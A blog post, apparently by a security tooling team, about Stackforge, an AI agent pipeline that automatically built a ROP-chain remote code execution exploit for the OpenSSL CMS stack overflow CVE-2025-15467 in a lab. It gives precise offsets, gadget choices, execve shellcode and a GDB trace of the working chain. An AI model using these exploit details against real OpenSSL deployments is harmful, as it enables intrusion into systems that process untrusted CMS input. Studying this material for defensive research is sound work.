After twenty-four CVEs, ten bypass findings, and eight disclosure submissions , CVEForge had proven its point. Hand it a CVE number, walk away, come back to a working PoC, a Docker lab, and a vulnerability analysis. For web applications, the pipeline mostly runs itself.

But web exploitation is the shallow end of the pool.

Crafting an HTTP request with a Blade template injection in the query string is one thing. Overflowing a stack buffer by precisely 40 bytes, setting a 4-byte integer at offset 0x1c to exactly 0x10 so the subsequent memcpy doesn’t crash before you reach the return address, then building three independent ROP chains against a binary with NX enabled - that’s a different discipline. The kind where debugging happens in GDB, not a browser console. Where the payload is bytes, not text. Where one wrong nibble at the wrong offset means the difference between a segfault and a shell.

We’d been staring at this boundary since the first CVEForge run. CVEForge handles the vulnerability classes you find in web applications: SSTI, SQLi, IDOR, command injection, deserialization in managed runtimes. It doesn’t know what a return address is. It’s never built a ROP chain. It couldn’t tell you the difference between partial RELRO and full RELRO if you asked nicely.

So we forked Shannon again.

Stackforge

Same move as CVEForge : take Shannon’s infrastructure, rip out the domain-specific parts, rewire it for a different problem. This time the problem is binary exploit development - stack overflows, heap corruption, register control, ROP gadgets, shellcode, the whole classical tradecraft.

The changes were deeper this time. CVEForge replaced Shannon’s 13 web-pentest agents with 6. Stackforge replaced them with 9. All three - Shannon, CVEForge, and Stackforge - use conditional execution gates, but each asks a different question. Shannon’s gates check “did the vuln agent find anything exploitable?” CVEForge’s check “is the fix incomplete enough to attempt a bypass?” Stackforge’s ask “can you control execution?” - and the cost of a wrong answer is higher, because building ROP chains against a dead end burns real money.

The Pipeline

  1. Vulnerability Research - Queries the EIP MCP server for the full CVE brief, reviews the source code, analyzes the patch diff, maps the attack surface, assesses fix completeness.
  2. Environment Setup - Runs checksec, verifies ASLR status, checks library dependencies and their protections, confirms GDB+pwndbg, pwntools, ROPgadget, nasm, and keystone are all available.
  3. Lab Build - Builds Docker containers with the vulnerable binary exposed as a network service. For library vulnerabilities, it writes a custom C server harness, compiles it against the vulnerable library, and exposes it over TCP.
  4. Crash PoC - Achieves a controlled crash, verifies it in GDB, confirms reproducibility across 5 runs, writes a self-contained Python script. Produces a phase gate.
  5. Control Analysis - Maps register control at the crash point, calculates precise buffer offsets, discovers ROP gadgets in the binary and libraries, recommends an exploitation strategy. Produces a phase gate.
  6. Exploit Development - Builds the actual exploit: ROP chain construction, shellcode, payload layout with bad character handling and stack alignment. Iterates with GDB until code execution is achieved.
  7. Exploit Validation - Runs the exploit 5+ times with container restarts between runs, tests all strategies, verifies RCE evidence in GDB. Calculates success rate.
  8. Report - Full writeup with methodology, payload breakdown, and mitigation recommendations.
  9. Bypass (conditional) - Same as CVEForge. Only fires if vulnerability research flagged the fix as incomplete.

The Gates

Shannon, CVEForge, and Stackforge all use conditional execution gates - it’s a pattern that carries across all three forks. But binary exploit development has harder failure modes than web exploitation. The buffer overflow is real but a stack canary blocks RIP control. The vulnerability is a read-only out-of-bounds with nothing useful to overwrite. The heap layout is unpredictable and the primitive is write-one-null. These are the failure modes where you want to stop early rather than spend $15 on a ROP chain that can’t land. In Stackforge, the crash-poc agent writes a crash_gate.json:

{"proceed": true, "reason": "Crash confirmed with SIGSEGV at 0x7ffff7777a8c"}

Or:

{"proceed": false, "reason": "Buffer overflow exists but canary terminates before ret"}

The control-analysis agent does the same. If either gate fails, the pipeline short-circuits to the report phase. You still get useful output - the research, the environment analysis, the partial crash analysis - but you don’t burn $15 building ROP chains for a vulnerability that can’t be exploited. Knowing when to stop is as important as knowing how to start.

The Tooling

CVEForge’s MCP stack was simple: EIP for intelligence, Docker CLI for labs. Stackforge needed more. Exploit development is interactive in a way that web PoC generation isn’t. You need to see inside the process while it’s running.

GDB MCP - Tasuku Suzuki’s mcp-gdb gives agents a debugger as a first-class tool. Launch processes under GDB, set breakpoints at arbitrary addresses, step through instructions, examine registers and memory, watch memory locations, analyze crash dumps. The crash-poc agent uses it to confirm the crash location and register state. The control-analysis agent uses it to map payload bytes to register values. The exploit-dev agent uses it to verify each gadget in the ROP chain. Making the debugger an MCP tool was the single most impactful design decision. The exploit-dev agent called GDB 47 times during the successful run.

SharkMCP - A heavily modified fork of tuliperis’s SharkMCP , reshaped for exploit development. Eight tools: start and stop capture sessions with BPF filters, analyze PCAP files with display filters, list and follow TCP/UDP streams in hex, extract fuzz seeds from captured traffic, and manage reusable filter configurations. For network-delivered exploits - which is what Stackforge builds - seeing the actual bytes on the wire is the difference between guessing why the exploit failed and knowing. We added TLS decryption via SSLKEYLOGFILE, JSON pagination for large captures, and hex stream following - the features you need when you’re debugging why a ROP chain isn’t landing over a TLS connection.

stackforge-helper - Three tools: save_deliverable (same as CVEForge), run_exploit_test (execute a command, capture exit code, signal, stdout/stderr, and core dump status), and check_binary_protections (structured checksec: RELRO, canary, NX, PIE, FORTIFY). run_exploit_test is what lets agents iterate without manual shell interaction - send a payload, check if you got SIGSEGV, adjust, repeat. Boring but critical.

The First Run: CVE-2025-15467

We needed something with genuine binary exploitation complexity. Not a web app. Not a managed runtime. A stack buffer overflow in C, in a library that matters, with protections to work around.

CVE-2025-15467 in OpenSSL 3.4.3 - though the vulnerable code exists in every OpenSSL release from 3.0.0 through 3.6.0. A stack buffer overflow in evp_cipher_get_asn1_aead_params(), the function that parses GCM cipher parameters from CMS AuthEnvelopedData structures. The vulnerability is a double-call pattern:

// First call: returns actual IV length into i (attacker-controlled)
i = ossl_asn1_type_get_octetstring_int(type, NULL, EVP_MAX_IV_LENGTH, &tl);

// Second call: uses i as max_len instead of EVP_MAX_IV_LENGTH
ossl_asn1_type_get_octetstring_int(type, iv, i, &tl);
// → memcpy copies i bytes into 16-byte iv[] buffer → overflow

The iv buffer is 16 bytes (EVP_MAX_IV_LENGTH). The attacker controls the GCM nonce length in the CMS structure. Set it to 256 bytes and you overflow the stack with controlled data.

The binary protections on the lab server: no RELRO, no canary, NX enabled, no PIE, no FORTIFY. Hard enough to be interesting (NX means no direct shellcode - you need ROP), soft enough to be tractable for a first run.

./stackforge start CVE=CVE-2025-15467

What Happened

The vulnerability research agent pulled the CVE brief from EIP, cloned the OpenSSL 3.4.3 source, found the vulnerable function at crypto/evp/evp_lib.c:221-240, and traced the call chain from CMS_decrypt() through ossl_cms_EncryptedContent_init_bio() into the vulnerable function. It identified the root cause: ossl_asn1_type_get_octetstring_int() returns the actual IV length but only copies min(max_len, actual_length) bytes. The caller uses the returned length as max_len for the second call. A subtle API misuse - the kind where the return value semantics and the copy semantics diverge.

The agent then did something we didn’t explicitly ask for: it checked every other caller of the same function in the OpenSSL tree. Eleven files declare iv[EVP_MAX_IV_LENGTH] on the stack. Ten of them are safe - they use the cipher’s declared IV length as the bound, or validate the returned length matches exactly. Only the GCM parameter handler is vulnerable. It also confirmed the PKCS#7 path is safe - EVP_CIPHER_asn1_to_param() passes NULL for the params struct, and the vulnerable function returns early. Good to know if your exposure is PKCS#7-only.

The fix eliminates the double-call pattern entirely: one call, EVP_MAX_IV_LENGTH as the bound, explicit rejection if the returned length exceeds 16. Correct and complete. Fifteen and a half minutes.

Then the lab build agent did something that still impresses us. We told it to exploit OpenSSL. OpenSSL is a library - there’s no binary you can point an exploit at and send it a malicious packet. There’s no listening port. There’s no attack surface until something calls the vulnerable function. The agent’s response was to write its own vulnerable application.

It authored cms_server.c from scratch - a 150-line C program that opens a TCP socket on port 4433, accepts connections, reads a length-prefixed CMS message, and passes it straight into CMS_decrypt(). A minimal, purpose-built attack surface. It compiled the harness against the vulnerable OpenSSL 3.4.3 libraries with the right linker flags (-L/opt/openssl-vuln/lib64 -lcrypto -lssl), built a Docker container with the certificate and key material, joined it to the stackforge_default network, and verified the service was processing valid CMS messages before declaring the lab ready.

Nobody told it to write a server harness. The prompt said “build a lab environment.” The agent looked at the target - a library, not a binary - and concluded it needed to create the application that makes the vulnerability reachable. Fourteen minutes and forty-two seconds.

The crash-poc agent found the pre-built crash CMS in the workspace, tested it both locally and over the network, confirmed SIGSEGV in GDB - rdx = 0x41414141, the corrupted i variable being fed to memcpy - and ran 5 reliability tests. 100% crash rate. The server auto-restarts between crashes. Five minutes and forty-five seconds. Crash gate: proceed.

The control-analysis agent mapped the stack layout at the vulnerable function:

Offset  Size  Content
0x00    16    iv[16] buffer        ← overflow starts here
0x10    8     tl (long)
0x18    4     padding
0x1c    4     i (int)              ← controls memcpy size
0x20    8     saved RBP
0x28    8     saved RIP            ← return address
0x30+   ...   caller stack frame   ← ROP chain goes here

Here’s the trick that separates a DoS from RCE. If you fill everything with 0x41, the i variable at offset 0x1c becomes 0x41414141. The subsequent memcpy(asn1_params->iv, iv, i) tries to copy a gigabyte and segfaults immediately - a crash, but the function never returns, so your ROP chain at offset 0x28 never executes. To get code execution, you need to set i to exactly 16 at offset 0x1c. That way the second memcpy copies 16 bytes into asn1_params->iv, returns normally - and lands on your controlled return address.

One wrong byte at one offset. The agent figured this out by examining the source code, cross-referencing the GDB crash data, and reasoning about the stack layout. It then ran ROPgadget against libc and inventoried the usable gadgets: pop rdi; ret, pop rsi; ret, pop rdx; ret, syscall; ret, jmp rsp. Eleven minutes. Control gate: proceed.

The exploit-dev agent built three independent RCE strategies:

StrategyPayloadGadgetsTechnique
ret2system72 bytes4pop rdi"/bin/sh"system()
execve_syscall112 bytes9Pure ROP: set rax=59, rdi, rsi, rdx → syscall
mprotect_jmprsp129 bytes8 + shellcodemprotect(stack, RWX)jmp rsp → 25-byte execve shellcode

The 25-byte shellcode is a textbook execve("/bin//sh", NULL, NULL):

xor    rsi, rsi              ; argv = NULL
push   rsi                   ; push NULL terminator
movabs rdi, "/bin//sh"       ; load path
push   rdi                   ; push onto stack
mov    rdi, rsp              ; rdi → path string
xor    rdx, rdx              ; envp = NULL
mov    al, 59                ; SYS_execve
syscall

One detail worth noting: the vuln-research agent surfaced a public RCE exploit via EIP (by guiimoraes, classified working_poc). The exploit-dev agent pulled the source as reference - and noticed it used RIP_OFFSET = 56. The control-analysis deliverable said 40. The difference: guiimoraes targets the OpenSSL CLI binary (openssl cms -decrypt), which is compiled with optimization and saves callee-preserved registers (R12-R15) onto the stack, adding 16 bytes to the frame. Our cms_server was compiled with -O0 -fno-stack-protector - tighter frame, offset 0x28. The agent recognized this was a different binary with a different stack layout, trusted its own GDB data, and built accordingly. The intelligence helped; blind copying would have crashed.

Thirteen minutes of iterative GDB debugging - 47 GDB MCP calls in this phase alone. The smallest exploit (ret2system) is 72 bytes. The largest (mprotect + shellcode) is 129 bytes. All three fit inside a single TCP packet: 534-598 bytes of CMS data, one connection, no authentication.

The validation agent then restarted the container between each test, ran each strategy 5 times, and verified RCE with GDB attached to the server process. Here’s the money shot - the complete GDB trace for the mprotect chain:

====== BREAKPOINT 1: RET of vulnerable function ======
RBP = 0xdeadbeefcafebabe         ← controlled (payload[0x20-0x27])
RSP → 0x00007ffff77c87e5         ← pop rdi; ret (first ROP gadget)

Full ROP chain on stack:
0x7fffffffe7d8: 0x00007ffff77c87e5   pop rdi; ret
0x7fffffffe7e0: 0x00007ffffffde000   stack page address
0x7fffffffe7e8: 0x00007ffff77c9f99   pop rsi; ret
0x7fffffffe7f0: 0x0000000000021000   132KB
0x7fffffffe7f8: 0x00007ffff789eefd   pop rdx; ret
0x7fffffffe800: 0x0000000000000007   PROT_RWX
0x7fffffffe808: 0x00007ffff78a2a20   mprotect()
0x7fffffffe810: 0x00007ffff77a6c09   jmp rsp
0x7fffffffe818: 0x622fbf4856f63148   shellcode bytes...

====== BREAKPOINT 2: mprotect() ======
rdi (addr) = 0x7ffffffde000          ✓ stack page
rsi (len)  = 0x21000                 ✓ 132KB
rdx (prot) = 0x7                     ✓ PROT_READ|PROT_WRITE|PROT_EXEC

====== BREAKPOINT 3: jmp rsp → shellcode ======
0x7fffffffe818: xor    %rsi,%rsi
0x7fffffffe81c: movabs $0x68732f2f6e69622f,%rdi    ← "/bin//sh"
0x7fffffffe82d: mov    $0x3b,%al                    ← SYS_execve (59)
0x7fffffffe82f: syscall

>>> process 1 is executing new program: /usr/bin/dash

The server process - PID 1 - is gone. Replaced by a shell. That last line is GDB telling you the cms_server binary no longer exists in memory. execve didn’t spawn a child process. It became /usr/bin/dash. That’s RCE in the classical, unambiguous sense.

A surprise during development: setarch x86_64 -R does not fully disable ASLR. The exploit-dev agent discovered at turn 90 that libc had shifted by one page - 0x7ffff77a2000 on one run, 0x7ffff77a1000 on the next. A 0x1000 jitter. The agent’s response was to add auto-detection: before sending the payload, query /proc/1/maps inside the container for the actual libc base. The exploit now works regardless of the jitter. A small thing, but the kind of adaptation that separates a demo from a tool.

The validation agent ran 10 edge cases on top of the 7 reliability runs: normal nonces (12 and 16 bytes) don’t crash, a 17-byte nonce overflows but doesn’t reach RIP, setting i to zero still lets the ROP chain fire, 512-byte payloads work fine, rapid-fire back-to-back exploits succeed after the 2-second server restart, and truncated CMS messages get a clean ASN.1 parse error. All passed. 7/7 reliability, 10/10 edge cases.

The Struggle (Honest Version)

That was run number nine.

Runs one through eight failed. The first three couldn’t even build the lab - the agent tried to use openssl s_server as the target, which doesn’t call CMS_decrypt() and can’t be crashed with a CMS payload. Three runs burned before the agent made the conceptual leap that it needed to write its own vulnerable application. That insight - the library has no attack surface until you build one - was the most expensive lesson in the whole project.

Run four tried to build OpenSSL from source inside the container - a 20-minute compile that timed out. Run five switched to pre-built libraries but got the linker flags wrong: no -L path, so the system’s OpenSSL was linking instead of the vulnerable one. Then the -lssl symlink was missing. Then openssl.cnf was missing, so the certificate generation for the test CMS files failed. Then the crash didn’t trigger because the recipient cert in the test CMS didn’t match the dummy cert the harness was using. Each problem self-corrected within a few turns, but the lab-build phase consumed ~95 turns across the failed runs. Run six fixed the lab but the crash-poc agent couldn’t construct the right CMS ASN.1 structure from scratch - DER encoding is finicky and the agent kept producing malformed messages that OpenSSL rejected before reaching the vulnerable function.

Run seven almost worked - the agent got all the way to control-analysis before using the wrong libc base address. It checked /proc/self/maps (the Stackforge worker container) instead of the server process inside the lab container. The ROP chain pointed at the wrong addresses. Run eight reached exploit-dev but hit a Temporal activity timeout at 2 hours while iterating on the ROP chain.

Run nine worked. Every agent succeeded on the first attempt. All the lessons from runs one through eight were baked into the prompts and workspace: the pre-built harness source, the correct libc lookup method, the pre-generated crash CMS template, the Docker networking hints. Not magic. Residue. The same loop we ran with CVEForge - run, fail, learn, encode, run again - just with harder problems and more spectacular failures.

Watching an AI agent get the linker flags wrong three times in a row is a humbling experience. We’ve all been there, of course. But watching it happen at $5 per attempt adds a certain urgency to the prompt engineering.

The Numbers

The full pipeline completed. Eight phases, all on the first attempt:

PhaseAgentDurationCost% Time
Vulnerability Researchvuln-research15m 34s$4.7318.4%
Environment Setupenv-setup3m 48s$0.904.5%
Lab Buildlab-build14m 42s$3.5817.4%
Crash PoCcrash-poc5m 45s$1.796.8%
Control Analysiscontrol-analysis11m 11s$3.9513.2%
Exploit Developmentexploit-dev13m 14s$5.5615.6%
Exploit Validationexploit-validation15m 54s$3.5918.7%
Reportreport4m 38s$1.045.5%
Bypassbypassskipped--
Total84m 46s$25.15100%

First RCE was achieved at the 64-minute mark (end of exploit-dev). Validation and reporting added another 20 minutes - the validation agent is thorough, running 7 reliability tests across all three strategies plus 10 edge cases, with GDB-attached breakpoint verification for each strategy.

The bypass agent was skipped because the vulnerability research assessed the fix as correct and complete - it eliminates the double-call pattern entirely and adds an explicit length check. The right call.

Exploit-dev was the most expensive phase at $5.56. The iterative GDB loop burns tokens - the agent called the GDB MCP tool 47 times in 13 minutes. Validation was close behind at $3.59 because it restarts containers between runs and attaches GDB to the server process for each strategy verification. The cheapest meaningful phase was crash-poc at $1.79 - it had good workspace context from the earlier agents and the pre-built crash CMS.

The phase gates saved nothing this time (both passed), but on a non-exploitable vulnerability they’d save the entire exploit-dev, validation, and reporting cost - roughly $10.

If you’re counting: eight failed runs at roughly $5-15 each, then the successful run at $25.15. Total development cost was closer to $100. That’s the honest number for going from zero to a working pipeline on a new vulnerability class. The ninth run is the one you show people. The first eight are the ones that taught the prompts.

What the EIP MCP Server Did

The Exploit Intelligence Platform MCP server is ours. We built it, we run it, and it’s the intelligence backbone of both CVEForge and Stackforge. It deserves a moment here because what it provided to this run matters.

The vuln-research agent’s first tool call was get_vulnerability for CVE-2025-15467. Back came: CVSS 9.8, affected versions (OpenSSL 3.0.0 through 3.6.0), CWE-787/CWE-121, the fix commit hash, four public exploits with AI-generated quality classifications, Nuclei templates, and upstream references. One call, five seconds, everything the agent needed to start. No tab-switching, no copy-pasting from NVD and ExploitDB and GitHub.

Then get_exploit_analysis on the top-ranked public exploit - classified as working_poc, no trojan indicators, reliability rated as reliable. The agent used that as a reference for its own crash PoC, adapting the DER construction approach rather than starting from scratch. get_exploit_code pulled the actual source. The intelligence didn’t just save time on the first agent - it cascaded through the pipeline. The crash-poc agent had a working CMS template because the vuln-research agent knew where to look. The exploit-dev agent had ROP chain precedent because EIP surfaced a public exploit that used the same technique.

Seventeen tools, real-time data from NVD, CISA KEV, EPSS, ExploitDB, Metasploit, GitHub, and six other sources. No API key required. The same EIP MCP server that powered CVEForge’s twenty-four CVEs powered this one too - it just had to answer different questions. “What are the gadget offsets?” isn’t in its vocabulary, but “What’s the fix commit and are there working public exploits?” is exactly the kind of intelligence that turns a 15-minute research phase into something that would otherwise take an hour of manual triage.

What This Isn’t

We should be direct about what Stackforge doesn’t prove yet.

ASLR was disabled. PIE was off. The binary had no stack canary and no FORTIFY. The server harness was purpose-built for exploitation. This is a controlled lab with the training wheels on. Real-world binary exploitation against a hardened target - with ASLR, full RELRO, stack canaries, and position-independent code - is a harder problem by an order of magnitude.

We know that. The point of this run was to validate the architecture: can nine agents, orchestrated by Temporal, using GDB and SharkMCP and EIP as tools, collaborate to produce a working binary exploit? Can the phase gate system short-circuit gracefully? Can the pipeline iterate through the crash-control-exploit cycle the way a human exploit developer does - crash it, map what you control, build the chain, verify it works?

The answer is yes. On easy mode, with the protections turned down and the environment controlled, but yes. The architecture works. The agents can use GDB. The pipeline produces real ROP chains that achieve real code execution - verified by GDB reporting “process 1 is executing new program: /usr/bin/dash.”

The vulnerability itself is real regardless of protections. Any application calling CMS_decrypt() with AES-GCM on untrusted input is affected - email servers processing S/MIME, web APIs accepting CMS payloads, certificate enrollment systems, anything using OpenSSL 3.0.0 through 3.6.0. With protections enabled, exploitation is harder. Without them, it’s a single TCP packet.

Now we turn the protections back on.

What’s Next

The run surfaced five concrete improvements. We implemented all of them before writing this post - the same loop we ran with CVEForge. Run, fail, learn, encode, run again.

  1. Binary path validation in preflight. The config said /opt/openssl-vuln/bin/openssl; the actual path inside the container was /targets/cve-2025-15467/openssl-vuln/bin/openssl. Twenty turns wasted discovering this. Now preflight.ts validates that binary_path exists after target setup. If the configured path is missing but a matching binary exists under the target directory, it creates a symlink. If it can’t find it at all, it logs a warning - non-fatal, since the env-setup agent can still discover it, but at least the obvious case is handled.

  2. ASLR enforcement in preflight. The config says aslr: disabled but the container started with randomize_va_space=2. The agent had to manually write to /proc/sys/kernel/randomize_va_space. Now a new enforceEnvironmentConfig() step in preflight reads the config’s environment settings and applies them before any agent runs. The worker container has SYS_PTRACE and the entrypoint runs as root, so we have the access. Non-fatal on failure - the agent can still do it manually.

  3. Lab prompt hints. “Use pre-built libraries, don’t compile from source.” “Ensure library symlinks exist for linker flags.” “Include config files the software expects at runtime.” “For TLS/crypto vulnerabilities, ensure test certificates match the data format being tested.” Four lines in the prompt, thirty turns saved.

  4. Env-setup deduplication. The environment agent called check_binary_protections twice on the same libraries. A one-line prompt addition: “Track what you’ve already checked; avoid redundant tool calls.”

  5. Preflight .gitignore for build directories. The git checkpoint system (git add -A) choked on embedded git repos in the target directory - the same issue CVEForge had. Preflight now creates a .gitignore with entries for build/, *.o, *.so, and nested .git/ directories. Only if one doesn’t already exist.

Beyond the pipeline fixes: ASLR bypass is the next vulnerability class to tackle. Information leak primitives, partial overwrites, the whole ASLR defeat toolkit. Then PIE, then stack canaries, then heap exploitation - use-after-free, double-free, tcache poisoning - which is a fundamentally different workflow that may need new agents entirely.

Stackforge is rougher than CVEForge was at this stage. But the foundation - Shannon’s orchestration, the phase gates, the MCP tool integration, and the GDB/SharkMCP tooling - is solid. The improvements are prompt-level and infrastructure-level, not architectural. The architecture works.

One CVE number. Nine agents. Four MCP servers. Three ROP chains. Twenty-five dollars. process 1 is executing new program: /usr/bin/dash. Old-school exploit development, automated.